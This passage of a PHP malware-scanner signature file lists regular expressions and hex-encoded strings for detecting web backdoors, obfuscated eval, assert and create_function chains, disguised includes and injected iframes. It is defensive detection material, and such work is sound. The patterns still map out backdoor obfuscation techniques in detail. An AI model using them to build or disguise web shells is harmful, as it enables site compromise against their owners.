				'<\?(?:php)?\s+@?include(?:_once)?\s*\([\'"][^;\)]+(gif|png|jpg|jpeg|ico)[\'"]\)\s*;\s*\?>' => array(REX_CLEAR_MULTIMATCH, 'rex.include_images.002', '<\?(?:php)?\s+@?include(?:_once)?\s*\([\'"][^;\)]+(gif|png|jpg|jpeg|svg)[\'"]\)\s*;\s*\?>'),
				'<\?php if \(isset\(\$_' => array(REX_CLEAR_MULTIMATCH, 'rex.include_images.004', '<\?(?:php)?\s+if \(isset\(\$_GET\["\S+"\]\)\)\{\s*@?include(?:_once)?\s*\([\'"][^;\)]+(gif|png|jpg|jpeg|ico)[\'"]\)\s*;\s*die;\s*}\s*\?>'),
				'if\s*\(\$_SESSION\[.user_id.\]\s*==\s*\d+\s*&&\s*file_exists\s*\([^\)]+\)\s*\)\s*{\s*\@include\([^\)]+\.txt.\)\s*;exit\s*;\s*}' => array(REX_CLEAR_MULTIMATCH, 'rex.include_malware_txt.001', 'if\s*\(\$_SESSION\[.user_id.\]\s*==\s*\d+\s*&&\s*file_exists\s*\([^\)]+\)\s*\)\s*{\s*\@include\([^\)]+\.txt.\)\s*;exit\s*;\s*}'),
			),

			'\t{30}(?:<(\?)php\s+)?@?include\s*["\'][^;]+?;(?:\s*\1>)?' => array(REX_CLEAR_MULTIMATCH, 'rex.include_whitespace.001', '\t{30}(?:<(\?)php\s+)?@?include\s*["\'][^;]+?;(?:\s*\1>)?'),
			'@include[\s]*"[^"]+x[\w]{2}[^"]+(i|.x69)(c|.x63)(o|.x6f)";' => array(REX_CLEAR_MULTIMATCH, 'rex.include_images.005', '\/\*[\w]+\*\/[\s]*@include[\s]*"[^"]+x[\w]{2}[^"]+(i|.x69)(c|.x63)(o|.x6f)";[\s]*\/\*[\w]*\*\/'),
		),

		'@require' => array(STR_TRIGGER, 
			'<\?php[\s]*@require\(.\..images.[\d]+.\);' => array(REX_CLEAR_MULTIMATCH, 'rex.malware.require.001', '<\?php[\s]*@require\(.\..images.[\d]+.\);'),
			'@require\([\'"][(\w\-)]+\w+\/[\d]+[\'"]\);' => array(REX_CLEAR_MULTIMATCH, 'rex.require_abs_path.002', '@require\([\'"][(\w\-)]+\w+\/[\d]+[\'"]\);'),
		),

		'$jan=\'\';$feb=\'\';$mar=\'\';$apr=\'\';$may=\'\';$jun=\'\';' => array(STR_WHITE,
			'$coupon_code = getToken' => array(STR_WHITE,
				'\$\w\w\w+\s*=\s*\'.{1,10}\';[^\n]?\$\w\w\w+\s*=\s*\'.{1,10}\';[^\n]?\$\w\w\w+\s*=\s*\'.{1,10}\';[^\n]?\$\w\w\w+\s*=\s*\'.{1,10}\';[^\n]?\$\w\w\w+\s*=\s*\'.{1,12}\';[^\n]?\$\w\w\w+\s*=\s*\'.{1,12}\';' => array(REX_CLEAR_MULTIMATCH, 'rex.multi_vars.004', '<\?php\s*(\$\w+)[^\n]+;\s*(\$\w+)[^\n]+;[^\0]+(((\$\w+)\s*=\s*)?(\$\w+)\s*\()[^\0]+(\5\s*\([^;]+)?\);'),
			),
		),

		'${' => array(STR_TRIGGER, 
			'\@\${\$\w+\}\(\$\{\$p\.\$o\.\$s\.\$t}\s*\[\w+\]\);' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.assertdata.003', '\@\$\w+\s*=\s*["\']\w+["\']+;\s*\$\w+\s*=[_POSTpost\'\;\$\=]+\$[a-zA-Z]{0,6}\s*=\s*["\']+[asert]+["\'];\$[a-zA-Z]{0,6}\s*=["\'][asert]+["\'];\$\w+\s*=\s*\$\w+\.\$\w+\s*;\s*\@\${\$\w+\}\(\$\{\$p\.\$o\.\$s\.\$t}\s*\[\w+\]\);'),
		),

		'echo base64_encode' => array(STR_TRIGGER, 
			'<\?php\s*echo base64_encode\(.\w[^;]+\);\s*\Z' => array(REX_CLEAR_MULTIMATCH, 'rex.malware.plchldr.002', '<\?php\s*echo base64_encode\(.\w+[^;]+\);\s*\Z'),
		),

		'\$[\w]+[\s]*\^[\s]*[\w]+\(' => array(REX_TRIGGER, 
			';[\s]*[\w]+\(\$[\w]+,[\s]*\$[\w]+\[[\d]+\]\(\$[\w]+\[[\d]+\],[\s]*\$[\w]+[\s]*\^[\s]*[\w]+\(\$[\w]+,[\s]*\$[\w]+,[\s]*\$[\w]+\[[\d]+\]\(\$[\w]+\)\)\)\)' => array(REX_CLEARFILE, 'php.malware.generic.085', NULL),
		),

		'\.\$\w+;\$\w+\((\$\w+\[[0-9]{1,2}\]\.)+(\$\w+\[[0-9]{1,2}\]),\s*\$\w+\s*,.\d+.\);' => array(REX_CLEAR_MULTIMATCH, 'rex.chr_functions.001', '<\?php.*'),
	),

	'(\$\w+)\s*=\s*[\'"].{64}' => array(REX_TRIGGER, 

		'\$\w+\s*=\s*(\$\w+\[\d+\]\.){10}' => array(REX_TRIGGER, 

			'\$\w+\s*=\s*[\'"a-zA-Z\\\.\(\)0-9\*_;]+;' => array(REX_TRIGGER, 
				'\);";\s*(\$\w+)\s*=\s*[\'"a-zA-Z\\\.\(\)0-9\*_;]+;[^\$]+\s*\$\w+\s*[=\(]\s*(\1\[\d+\]\.){3}[^;]+;' => array(REX_CLEAR_MULTIMATCH, 'rex.array_join.011', '(?:if\([^\}]+)?(\$\w+)\s*=\s*[\'"].{64}[^>]+;\s*(\$\w+)\s*=\s*[\'"a-zA-Z\\\.\(\)0-9\*_;]+;[^\$]+\s*\$\w+\s*[=\(]\s*(\2\[\d+\]\.){3}[^;]+;\s*\$\w+\s*[=\(]\s*(\2\[\d+\]\.){3}[^;]+;(?:\}\s*else[^\}]+\})?'),
				// this sig has to be extensively tested after any changes, consult any changes with Peter
				'\$\w+\s*=\s*[\'"a-zA-Z\\\.\(\)0-9\*_;]{10,}\.[\'"a-zA-Z\\\.\(\)0-9\*_;]{10,}[\'"];' => array(REX_CLEAR_MULTIMATCH, 'rex.array_join.004', '(\$\w+)\s*=\s*[\'"].{20}[^>]+;(\$\w+)\s*[=\(]\s*[^,]+,[\s]*[^\)]+\);'),
			),

			' < $GLOBALS[' => array(STR_TRIGGER,
				']($_REQUEST);' => array(STR_TRIGGER,
					'<\?php\s*(\$\w+)\s*=\s*[\'"].{64}[^\n]+\$GLOBALS\[.(\w+).\]\s*=\s*\1\[\d+\]' => array(REX_CLEAR_MULTIMATCH, 'rex.array_join.005', '<\?php\s*(\$\w+)\s*=\s*[\'"].{64}[^\n]+\$GLOBALS\[.(\w+).\]\s*=\s*\1\[\d+\][^>]+\$GLOBALS\[.\w+.\]\(\1[^<]+\$GLOBALS\[.\w+.\]\(\1[^>]+\?>'),
				),
			),
		),

		'=\s*[\'".\sbase64_dco]{13,30}\s*;\s*\$\w+\s*=\s*[\'".\screat_funio]{15,30}\s*;\s*\$\w+\s*=\s*[\'".\sgzuncompres]{12,30}' => array(REX_CHAIN_TRIGGER,
			'=\s*[\'".\sbase64_dco]{13,30}\s*;\s*\$\w+\s*=\s*[\'".\screat_funio]{15,30}\s*;\s*\$\w+\s*=\s*[\'".\sgzuncompres]{12,30}\s*;[\s]\$[\w]+\(..,[\s]\$[\w]+\(\$[\w]+\(.[^;]{200}' => array(REX_CLEAR_LINEMATCH, 'php.malware.create_function.008', '\$\w+\s*=\s*[\'".\sbase64_dco]{13,30}\s*;\s*\$\w+\s*=\s*[\'".\screat_funio]{15,30}\s*;\s*\$\w+\s*=\s*[\'".\sgzuncompres]{12,30}\s*;\s*\$\w+\s*\([\'"]{2}\s*,\s*\$\w+\s*\(\$\w+\s*\([\'"][^;]{500}[^;]+\)[\s]*;'),
			'@ini_set(\'display_errors\', 0);' => array(STR_CLEAR_LINEMATCH, 'php.malware.create_function.008.02', '@ini_set(\'display_errors\', 0);'),
		),

		'@@@' => array(STR_TRIGGER, 
			'(?:<\?php\s*)@[^\$]+@@(\$_\w+)' => array(REX_CLEAR_MULTIMATCH, 'rex.var_concatenation.001', '(?:<\?php\s*)@[^\$]+@@(\$_\w+)=[^\n]+@\1\{[^\}]+\}\s*\.\s*@\1\{[^\}]+\}\s*\.\s*[^\n]+;'),
		),

		'(?:142.141.163.145.66.64.137.144.145.143.157.144.145|147.172.151.156.146.154.141.164.145|143.162.145.141.164.145.137.146.165.156.143.164.151.157.156)' => array(REX_TRIGGER,
			'\\\\[\d]+[\'"];\$[\w]+[\s]*=[\s]*\$[\w]+\(..,[\s]*\$[\w]+\(\$[\w]+\(\$[\w]+\)\)\);[\s]*\$[\w]+\(\);' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.uploader_POST.015', '\$[\w]+[\s]*=[\s]*[\'"][^;]{200}[^;]+;[\s]*(\$[\w]+[\s]*=[\s]*[\'"]\\\\[\d]+\\\\[\d]+\\\\[\d]+\\\\[\d]+[^;]+;[\s]*){3}\$[\w]+[\s]*=[\s]*\$[\w]+\(..,[\s]*\$[\w]+\(\$[\w]+\(\$[\w]+\)\)\);[\s]*\$[\w]+\(\);'),    
		),

		'}.$' => array(STR_TRIGGER,
			'\$[\w]+[\s]*=[\s]*.{10,100};\$[\w]+[\s]*=[\s]*(.?\$[\w]+\{[\d]+\}.)*\1[^;]+;\$[\w]+[\s]*=[\s]*.{1000,9000}==.;[\s]*\$[\w]+=\$[\w]+\(\$[\w]+,\$[\w]+\);\$[\w]+\(\$[\w]+\);' => array(REX_CLEAR_MULTIMATCH,'php.malware.obfuscated.055', '\$[\w]+=.{100,};\$[\w]+=\$[\w]+\{[\d]+\}\.[^;]+;\$[\w]+=.{100,};\$[\w]+=\$[\w]+\(\$[\w]+,\$[\w]+\);\$[\w]+\(\$[\w]+\);'),
		),

		'=\s*\$\w+\(\$\w+\);\s*\$\w+\s*\(\$\w+\s*,\s*\$\w+\s*(\(\$\w+\))?\s*,\s*\$\w+\);' => array(REX_CLEAR_MULTIMATCH, 'rex.array_join.006', '(\$\w+)\s*=\s*[\'"].{64}[^>]+=\s*\$\w+\(\$\w+\);\s*\$\w+\s*\(\$\w+\s*,\s*\$\w+\s*(\(\$\w+\))?\s*,\s*\$\w+\);'),
		'\$[\w]+[\s]*=[\s]*[\'"][^;]{1000}[^;]+;[\s]*(\$[\w]+[\s]*.?=[\s]*[\'"][^;]+;[\s]*){10,}(\$[\w]+[\s]*\([\s]*){3,}\$[\w]+[\s\)]+;' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_chr.003', '\$[\w]+[\s]*=[\s]*[\'"][^;]{1000}[^;]+;[\s]*(\$[\w]+[\s]*.?=[\s]*[\'"][^;]+;[\s]*){10,}(\$[\w]+[\s]*\([\s]*){3,}\$[\w]+[\s\)]+;'),
		'(\$\w+)\s*=\s*[\'"]{1}[asert\.\'"\s]{8,}\s*;\s*(\$\w+)\s*=\s*\${[\'"\._POST]{6,}}\s*;\s*\1\(\2\[[\'"]\w+[\'"]\]\s*\);' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.assert.031', '(\$\w+)\s*=\s*[\'"]{1}[asert\.\'"\s]{8,}\s*;\s*(\$\w+)\s*=\s*\${[\'"\._POST]{6,}}\s*;\s*\1\(\2\[[\'"]\w+[\'"]\]\s*\);'),
		'\$[\w]+[\s]*=[\s]*[\'"][^;]{30,}[\'"];[\s]*(\$[\w]+[\s]*=[\s]*(\$[\w]+\[[\d]+\][\s]*\.[\s]*)+\$[\w]+\[[\d]+\];[\s]*)+\$[\w]+[\s]*=[\s]*\$[\w]+\([\'"]{2},[\s]*\$[\w]+[^\)]{500,}[\)\s]+;[\s]*\$[\w]+\(\);' => array(REX_CLEAR_MULTIMATCH, 'php.malware.UA_check.010', '\$[\w]+[\s]*=[\s]*[\'"][^;]{30,}[\'"];[\s]*(\$[\w]+[\s]*=[\s]*(\$[\w]+\[[\d]+\][\s]*\.[\s]*)+\$[\w]+\[[\d]+\];[\s]*)+\$[\w]+[\s]*=[\s]*\$[\w]+\([\'"]{2},[\s]*\$[\w]+[^\)]{500,}[\)\s]+;[\s]*\$[\w]+\(\);'),
	),

	'#\/\w\w\w\w\w\w#' => array(REX_TRIGGER, 
		'#\/\w\w\w\w\w\w#\s*\n*\?>' => array(REX_CLEAR_MULTIMATCH, 'rex.mlw_comment_tag.002', '#\w\w\w\w\w\w#.*#\/\w\w\w\w\w\w#'),
		'http:..\H+.php[^;]+\?fid=\w+&info="\s*.\s*http_build_query\(\s*\$' => array(REX_CLEAR_MULTIMATCH, 'rex.mlw_comment_tag.002.001', '#\w\w\w\w\w\w#[^#]+http:..\H+.php[^;]+\?fid=\w+&info="\s*.\s*http_build_query\(\s*\$[^#]+#\/\w\w\w\w\w\w#'),
		'#[\w]+#[\s]*error_reporting.0.;[\s]*@ini_set..display_errors.,0.;' => array(REX_CLEAR_MULTIMATCH, 'rex.mlw_comment_tag.002.002', '#[\w]+#[\s]*error_reporting.0.;[\s]*@ini_set..display_errors.,0.;.*#.[\w]+#'),           
		'#[\w]+#[\s]*if.empty.\$' => array(REX_CLEAR_MULTIMATCH, 'rex.mlw_comment_tag.002.03', '#[\w]+#[\s]*if.empty.\$[\w]+\)\).\{[\s]*\$[\w]+[\s]*=[\s]*[\'"][^#]+echo \$[\w]+;[\s]*}[\s]*#.[\w]+#'),           
	),

	'\$(?:\{")?_R(?:[\'\"]\s*\.\s*(?:\/\*[^\*]+\*\/)?[\"\'])?E(?:[\'\"]\s*\.\s*(?:\/\*[^\*]+\*\/)?[\"\'])?Q(?:[\'\"]\s*\.\s*(?:\/\*[^\*]+\*\/)?[\"\'])?U(?:[\'\"]\s*\.\s*(?:\/\*[^\*]+\*\/)?[\"\'])?E(?:[\'\"]\s*\.\s*(?:\/\*[^\*]+\*\/)?[\"\'])?S(?:[\'\"]\s*\.\s*(?:\/\*[^\*]+\*\/)?[\"\'])?T' => array(REX_TRIGGER, 
	
		'\s*=\s*(?:\/\*[^\*]+\*\/\s*?)?[\'"]a(?:[\'\"]\s*\.\s*(?:\/\*[^\*]+\*\/)?[\"\'])?s(?:[\'\"]\s*\.\s*(?:\/\*[^\*]+\*\/)?[\"\'])?s(?:[\'\"]\s*\.\s*(?:\/\*[^\*]+\*\/)?[\"\'])?e(?:[\'\"]\s*\.\s*(?:\/\*[^\*]+\*\/)?[\"\'])?r(?:[\'\"]\s*\.\s*(?:\/\*[^\*]+\*\/)?[\"\'])?t[\'"]' => array(REX_TRIGGER, 
			'[\'"asert]+\.?\/\*;\s*\$\w+\s*\=\s*\*\/\.?[\'"asert]+' => array(REX_CLEAR_MULTIMATCH, 'rex.assert_concat.001', '(\$\w+)[^;]++;\s*if\(\!empty\(\$_REQUEST[^\]]+\1\][^\{]++\{\s*(\$\w+)=[\'"asert\.\/\*;\$=]+[^\}]++\}[^;]+unlink\(__FILE__\);'),
			'iss' => array(STR_CLEAR_MULTIMATCH, 'rex.assert_concat.002', '(?:\/\*[^\*]+\*\/)?if\s*(?:\/\*[^\*]+\*\/)?\s*\(\s*isset(?:\/\*[^\*]+\*\/)?\([^_]+[_REQUST"\.]{6,}[^\$]+\$\w+\s*(?:\/\*[^\*]+\*\/\s*?)?=\s*(?:\/\*[^\*]+\*\/\s*?)?[\'"]a([\'"]\s*\.\s*["\'])?s([\'"]\s*\.\s*["\'])?s([\'"]\s*\.\s*["\'])?e([\'"]\s*\.\s*["\'])?r([\'"]\s*\.\s*["\'])?t[\'"];[^_]+_REQUES[^\[]+\[.\w+.\][^;]+;(?:\/\*[^\*]+\*\/)?(exit;)?(?:\/\*[^\*]+\*\/)?\}'),
		),

		'(\$\w+)\s*=\s*\$_REQUEST\[.\w+.\];[^>]+register_(shutdown|tick)_function\s*\(\1,\s*\$_REQUEST[^;]+;' => array(REX_CLEAR_MULTIMATCH, 'rex.eval_post.004', '(\$\w+)\s*=\s*\$_REQUEST\[.\w+.\];[^>]+register_(shutdown|tick)_function\s*\(\1,\s*\$_REQUEST[^;]+;'),
	),

	'/e' => array(STR_TRIGGER,

		'\$[\w]+\([\'"]\/([\d]+)\/e[\'"],[\s]*\$[\w]+,[\s]*\1\);' => array(REX_TRIGGER,
			'@$_COOKIE[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_COOKIE.010', '(\$[\w]+)[\s]*=[\s]*@\$_COOKIE\[.[\w]+.\];[\s]*if[\s]*\(\1\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*\1\(@\$_COOKIE[^;]+;[\s]*\$[\w]+[\s]*=[\s]*\1\(@\$_COOKIE[^;]+;[\s]*\$[\w]+\([\'"]\/([\d]+)\/e[\'"][\s]*,[\s]*\$[\w]+,[\s]*\2\);[\s]*(die\(\);[\s]*)?\}[\s]*(else[\s]*(\{[^}]+}|phpinfo\(\);[\s]*die;))?'),
			'\'cookie\'));' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_COOKIE.010.02', '(\$[\w]+)[\s]*=[\s]*JRequest::getString\(.[\w]+.,[\s]*Null,[\s]*.cookie.\);[\s]*if[\s]*\(\1\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*\1\([^}]+\$[\w]+\([\'"]\/([\d]+)\/e[\'"],[\s]*\$[\w]+,[\s]*\2\);[\s]*die\(\);[\s]*}'),
		),

		'\$(\w+)\s*=\s*["\'\s\.preg_replace]*\s*;\s*@?\s*\$\1\s*\(\s*[^;]+?\/[^;]+?\/e[^,]+?,\s*\$_' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.pregreplace.022', '\$(\w+)\s*=\s*["\'\s\.preg_replace]*\s*;\s*@?\s*\$\1\s*\(\s*[^,;]+?\/[^,;]+?\/e[^,]+?,\s*\$_[^;]+?;'),
	),

	'@\$' => array(REX_TRIGGER, //must be REX - duplicate STR trigger in 7generic
	
		'[\'"]\S{64}' => array(REX_TRIGGER, 
			'\$\w+\s*=\s*(\$\w+\[\d+\]\.){11}' => array(REX_CLEAR_MULTIMATCH, 'rex.array_join.003', '\$[\w]+[\s]*=[\s]*"[^"]{30,}";[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\[[\d]+\][\s]*\.[\s]*\$[\w]+\[[\d]+\][^>]+;[\s]*@\$[\w]+\(@?\$[\w]+[^;]*\);'),  
		),
	
		'@\$\w+\(\$\w+\((\$\w+\(){2,}\$\w+\){3,};' => array(REX_CLEAR_MULTIMATCH, 'rex.obfuscated_functions.001', '\$\w+\s*=\s*..\w+[^;]+;\s*\$\w+=[^@]+@\$\w+\(\$\w+\((\$\w+\(){2,}\$\w+\){3,};'),
	),

	'\/\*\w' => array(REX_TRIGGER, 
		'\/\*[a-z0-9]{32}\*\/function [a-zA-Z]{30,}' => array(REX_CLEAR_MULTIMATCH, 'rex.malware.injector.033', '\/\*[a-z0-9]{32}\*\/function [a-zA-Z]{30,}.*<iframe.*;\/\*[a-z0-9]{32}\*\/'),
		'\/\*\/[a-z0-9]{6}\*\/' => array(REX_CLEAR_MULTIMATCH, 'rex.mlw_comment_tag.003', '\/\*[a-z0-9]{6}\*\/.*\/\*\/[a-z0-9]{6}\*\/'),
		' \/\*\w{48}\*\/if ' =>   array(REX_CLEAR_MULTIMATCH, 'rex.mlw_comment_tag.005', '\/\*\w{48}\*\/if .*;}\/\*\w{48}\*\/'),
	),

	'(\'\',' => array(STR_TRIGGER,
		'^' => array(STR_TRIGGER,
			'<\?php[\s]*\$[\w]+=\'[^\']+\'[\s]*\^[\s]*\'[^\']+\';[\s]*\$[\w]+=\$[\w]+\(\'\',' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_xor.002', '\$[\w]+=\'[^\']+\'[\s]*\^[\s]*\'[^\']+\';[\s]*\$[\w]+=\$[\w]+\(\'\',[\s]*\'[^\']+\'[\s]*\^[\s]*\'[^\']+\'\);[\s]*\$[\w]+\(\);'),
			'\$[\w]+[\s]*=[^\n\(]+\^[\s]*[\'\$][^\n\(]+\(\'\',[^\n;]*[\'\$][^\n]+\);[\s]*\$[\w]+\(\);' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.create_function.018', '\$[\w]+[\s]*=\'[^\n\(]+\'[\s]*\^[\s]*[\'\$][^\n\(]+\(\'\',[\s]*[\'\$][^\n]+\);[\s]*\$[\w]+\(\);'),
		),
	),

	'\$\w+ *= *[\'\"][a-z]{26}[0-9]{10}[_\*@\.,#\/]+[\'\"];' => array(REX_TRIGGER,
		'(\$\w+)\s*=\s*.abcdefghijklmnopqrstuvwxyz\(\*_;\/\.\).;\s*(\$\w+)\s*=\s*(\1\[\d+\]\.?){6}[^;]+;\s*\2' => array(REX_CLEAR_MULTIMATCH, 'rex.array_join.010', '<\?php[^\0]+(\$\w+)\s*=\s*.abcdefghijklmnopqrstuvwxyz\(\*_;\/\.\).;\s*(\$\w+)\s*=\s*(\1\[\d+\]\.?){6}[^;]+;\s*\2\([^\n]+'),
		'<\?php\s*function\s*([\w_]+)\s*\(\)\s*\{\s*(\$[\w_]+) *= *(?:array\()?[\'\"][\w_\.\?\*_@=\(\)\'\"\/\+;,#%\$\s]+[\'\"\)];' => array(REX_CLEAR_MULTIMATCH, 'rex.array_join.012', '<\?php\s*function\s*([\w_]+)\s*\(\)\s*\{\s*(\$[\w_]+) *= *(?:array\()?[\'\"][\w_\.\?\*_@=\(\)\'\"\/\+;,#%\$\s]+[\'\"\)];\s*(\$[\w_]+) *= *(?:array\()?[\'\"][\w_\.\?\*_@=\(\)\'\"\/\+;,#%\$\s]+[\'\"\)];\s*(?:\$[\w_]+ *= *(?:(?:\2|\3)\[\d+\]\.?)+;\s*)[^\?]+\1\([^;]+;\s*\?>'),
	),

	'|' => array(STR_TRIGGER,
		'.\'' => array(STR_TRIGGER,
			'\$[\w]+[\s]*=[\s]*\$[\w]+\([\s]*[\w]+[\s]*,[\s]*\$[\w]+\);[\s]*\$[\w]+\(\);' => array(REX_TRIGGER,
			   '(\$[\w]+)[\s]*=[\s]*(("[^"]+")|(\'[^\']+\'))[\s]*\.[\s]*[\w]+[\s]*\.[\s]*(("[^"]+")|(\'[^\']+\'))[\s]*\.[\s]*[\w]+[\s]*\.[\s]*(("[^"]+")|(\'[^\']+\'))[\s]*\.[\s]*[\w]+[\s]*\.' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.eval_xor.003', '(\$[\w]+)[\s]*=[\s]*(("[^"]+")|(\'[^\']+\'))[\s]*\.[\s]*[\w]+[\s]*\.[\s]*(("[^"]+")|(\'[^\']+\'))[\s]*\.[\s]*[\w]+[\s]*\.[\s]*(("[^"]+")|(\'[^\']+\'))[\s]*\.[\s]*[\w]+[\s]*\.[^\x02]{200,1000}\$[\w]+[\s]*=[\s]*\$[\w]+\([\w]+[\s]*,[\s]*\1\);[\s]*\$[\w]+\(\);'),
			),
		),
	),

	'\$\w+\s*=\s*[\'\.EeRrOor_rePporTtIiNnGg]{15,40}' => array(REX_TRIGGER,
		'\$\w+\s*=\s*[\'\.\s*BbAaSsEe64]{0,20}(?:\(\d+\s*\/\s*\d+\))?[\'\.\s*_DdeCcOo]{0,30}' => array(REX_TRIGGER, 
			'(\$\w+)\s*=\s*[\'\.EeRrOor_rePporTtIiNnGg]{0,40};\s*\1\s*\(\d\)\s*;\s*(\$\w+)\s*=\s*[\'\.AaSsEeTrTt]{0,18}\s*;\s*(\$\w+)\s*=\s*[\'\.BbAaSsEe64_DdeCcOo]{0,44}\s*;\s*(\$\w+)\s*=\s*[\'\.GgZzDdEeFfLlAaTt]{0,30}\s*;\s*(\$\w+)\s*=\s*[\'\.GgZzIiNnFfLlAaTtEe]{0,30}\s*;\s*(\$\w+)\s*=[^;]+;\s*(\$\w+)\s*=[^;]+;\s*\2\(\s*\5\s*\(\s*\3\s*\(\s*\6\s*\)\s*\)\s*\)\s*;\s*die\(\)\s*;' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.assert.023', '(\$\w+)\s*=\s*[\'\.EeRrOor_rePporTtIiNnGg]{0,40};\s*\1\s*\(\d\)\s*;\s*(\$\w+)\s*=\s*[\'\.AaSsEeTrTt]{0,18}\s*;\s*(\$\w+)\s*=\s*[\'\.BbAaSsEe64_DdeCcOo]{0,44}\s*;\s*(\$\w+)\s*=\s*[\'\.GgZzDdEeFfLlAaTt]{0,30}\s*;\s*(\$\w+)\s*=\s*[\'\.GgZzIiNnFfLlAaTtEe]{0,30}\s*;\s*(\$\w+)\s*=[^;]+;\s*(\$\w+)\s*=[^;]+;\s*\2\(\s*\5\s*\(\s*\3\s*\(\s*\6\s*\)\s*\)\s*\)\s*;\s*die\(\)\s*;'),
		),
	),

	'))); $' => array(STR_TRIGGER, 
		'\$\w+\s*=[base64_dco\'\s\.]+;\s*\$\w+\s*=[(create_funio\s*\'\.)]+;\s*\$\w+\s*=[(gzuncompres\s\.\')]+;\s*\$\w+\s*=\s*\$\w+\(["\']{2},\s*\$\w+' => array(REX_CLEAR_MULTIMATCH, 'rex.malware.injector.034', '(?:\/\/\w{32}\s*)?\$\w+\s*=[base64_dco\'\s\.]+;\s*\$\w+\s*=[(create_funio\s*\'\.)]+;\s*\$\w+\s*=[(gzuncompres\s\.\')]+;\s*(\$\w+)\s*=\s*\$\w+\(["\']{2},\s*\$\w+\(\$\w+\(\'[^\'\s\)]+\'\)\)\);\s*\1\(\);(?:\s*\/\/\w{32}\s*)?'),
	),

	'load' => array(STR_TRIGGER, 
		'\$[\w]+[\s]*=[\s]*\$[\w]+\([\'"]\$[\w]+[\'"],\$[\w]+\);[\s]*\$[\w]+\(.load.\);' => array(REX_CLEAR_MULTIMATCH, 'rex.eval_var.003', '\$[\w]+[\s]*=[\s]*[\'"][^;]{150,};[\s]*\$[\w]+[\s]*=[\s]*[\'"][^;]{30,};[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\([\'"]\$[\w]+[\'"],\$[\w]+\);[\s]*\$[\w]+\(.load.\);'),
	),

	'\s{200}\$' => array(REX_TRIGGER, 
		'chr\([\d]+\)[\s]*\.[\s]*[\'"]\\\x[\d]+[\'"][\s]*\.' => array(REX_CLEAR_MULTIMATCH, 'rex.chr_concatenation.004', '(\\$\\w+)=[prgplhxa-fA-F0-9\\(\\)\\."\\\\_]+;(\\$\\w+)=["evlxhra-fA-F0-9\\\\\\.\\(\\)_]+[^\\n]+(?:\\1\\(\\$\\w+,\\s*\\2[^;]+;)?'),
	),

	'<\?(php)?\s+(\$\w+)=["base_dcohr\.\(\)0-9]{14,};\?>' => array(REX_CLEAR_MULTIMATCH, 'rex.split_injection.001.01', '<\?(php)?\s+(\$\w+)=["base_dcohr\.\(\)0-9]{14,};\?>'),
	'^[A-Za-z0-9\+\/]{500}' => array(REX_WARN, 'rex.long_nonstandard.001', NULL),
),


'\x' => array(STR_TRIGGER,  

	'\x61\x' => array(STR_TRIGGER,

		'\x65\x76\x61\x6c' => array(STR_TRIGGER,
		),

		'\x62\x61\x73e\x36\x34_\x64\x65' => array(STR_WARN, 'php.malware.base64.002.02', NULL,1),    
		'\x67\x7a\x69\x6e\x66\x6c\x61\x74' => array(STR_WARN, 'php.backdoor.pregreplace.006', NULL,1),
		'\x62\x61\x73\x65\x36\x34\x5f\x64' => array(STR_WARN, 'php.malware.base64.002.03', NULL,1),
		'\x62\x61\x73\x65\x364\x5fd\x65' => array(STR_WARN, 'php.malware.base64.002.04', NULL,1),
		'\x61\x73\x65\x36\x34_\x64' => array(STR_WARN, 'php.malware.base64.002.05', NULL,1),
		'\x63\x72e\x61\x74\x65_\x66\x75\x6e' => array(STR_WARN, 'php.malware.create_function.001.04', NULL,1),
		'\145\x76\x61\x6c' => array(STR_WARN, 'php.backdoor.eval_gen.001.03', NULL,1),
		'\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34' => array(STR_WARN, 'php.backdoor.eval_gen.001.05', NULL,1),
		'"\x64\x69\x73\x70\x6c\x61\x79"]="\x6e\x6f\x6e\x65"' => array(STR_WARN, 'js.spam-seo.hidden-style.007', NULL,1),
		'\x63\x32\x2E\x70\x6F\x70\x61\x64\x73\x2E\x6E\x65\x74\x2F\x70\x6F\x70' => array(STR_WARN, 'js.malware.popads.001', NULL,1),
		'<i\x66\x72\x61m\x65\x20onlo\x61d=\x27\x61\x384gVF(\x29;\x27 src=\x27' => array(STR_WARN, 'js.malware.hidden-iframe.007', NULL,1),
		'\x63\x72\x65\x61\x74\x65\x5f\x66\x' => array(STR_WARN, 'php.malware.create_function.001', NULL,1),
		'="\x63\x72\x65\x61\x74\x65\x5f' => array(STR_WARN, 'php.malware.create_function.001.02', NULL,1),
		'\x63r\x65\x61\x74e\x5f\x66\x75\x6e\x63\x74' => array(STR_WARN, 'php.malware.create_function.001.05', NULL,1),
		'\x65\x61\x74\x65_\x66\x75' => array(STR_WARN, 'php.malware.create_function.001.06', NULL,1),
		'strrev("\x65\x64\x6f\x63\x65\x64\x5' => array(STR_WARN, 'php.malware.base64.006', NULL,1),
		'\x70\162\x65\x67\x5f\x72' => array(STR_WARN, 'php.malware.hex_oct_obfuscation.002', NULL,1),
		'd\x65\x63\157de"' => array(STR_WARN, 'php.backdoor.eval_gen.002.02', NULL,1),
		'\x36\x34\x5f\x64\x65\x63\x6f\x64\x65' => array(STR_WARN, 'php.backdoor.base64.002.02', NULL,1),
		'\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64' => array(STR_WARN, 'php.malware.base64.023', NULL,1),
		'\x70\x72\x65\x67\x5f\x72\x65\x70' => array(STR_WARN, 'php.backdoor.pregreplace.004', NULL,1),
		'\150\x65\x61\x64e\162' => array(STR_WARN, 'php.redirect.header_location.003', NULL,1),
		'<script> var _0x' => array(STR_WARN, 'js.malware.hexvar.001', NULL, 1),
	),

	'), 0755); $' => array(STR_TRIGGER,  
		', 0644);' => array(STR_TRIGGER,  
			'.x[\w]{2}.x[\w]{2}.x[\w]{2}' => array(REX_WARN, 'rex.hex_obfuscated.002', NULL),
		),
	 ),

